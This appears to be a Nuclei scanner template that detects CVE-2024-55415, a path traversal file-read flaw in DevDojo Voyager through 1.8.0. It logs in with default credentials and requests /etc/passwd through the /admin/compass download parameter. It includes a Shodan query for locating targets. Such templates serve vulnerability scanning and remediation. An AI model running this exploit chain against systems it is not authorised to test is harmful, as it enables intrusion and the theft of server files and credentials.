id: CVE-2024-55415

info:
  name: DevDojo Voyager <=1.8.0 - Arbitrary File Read
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    DevDojo Voyager through 1.8.0 is vulnerable to path traversal at the /admin/compass.
  impact: |
    Authenticated attackers can exploit path traversal to read arbitrary files from the server, potentially exposing sensitive configuration files, credentials, and application source code.
  remediation: |
    Update DevDojo Voyager to version 1.8.1 or later to address the path traversal vulnerability.
  reference:
    - https://www.sonarsource.com/blog/the-tainted-voyage-uncovering-voyagers-vulnerabilities/
    - https://github.com/thedevdojo/voyager/blob/1.6/src/Http/Controllers/VoyagerCompassController.php#L213
    - https://github.com/thedevdojo/voyager/blob/1.6/src/Http/Controllers/VoyagerCompassController.php#L44
    - https://nvd.nist.gov/vuln/detail/CVE-2024-55415
  classification:
    cve-id: CVE-2024-55415
    epss-score: 0.63776
    epss-percentile: 0.9845
  metadata:
    verified: true
    max-request: 4
    shodan-query: title:"Voyager"
  tags: cve,cve2024,devdojo,voyager,lfr,lfi,vuln

variables:
  username: "admin@admin.com"
  password: "password"

http:
  - raw:
      - |
        GET /admin/login HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        internal: true
        name: csrf
        group: 1
        regex:
          - 'name="_token" value="([a-zA-Z0-9]+)"'

  - raw:
      - |
        POST /admin/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _token={{csrf}}&email={{username}}&password={{password}}&

    matchers:
      - type: dsl
        dsl:
          - "contains(body,'/admin')"
          - "status_code == 302"
        condition: and
        internal: true

  - raw:
      - |
        GET /admin/compass?download={{base64('/etc/passwd')}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - regex('root:.*:0:0:', body)
          - status_code == 200
        condition: and
# digest: 4a0a0047304502207bcccbb0d156efd39209f69ae49669f7200fc919d62ed000d060e36ce0d4d7460221009c715812d351a32c1ea65a8494a48b0be3cfa860791ee1bb185d6dd6d36ced9c:922c64590222798bb761d5b6d8e72950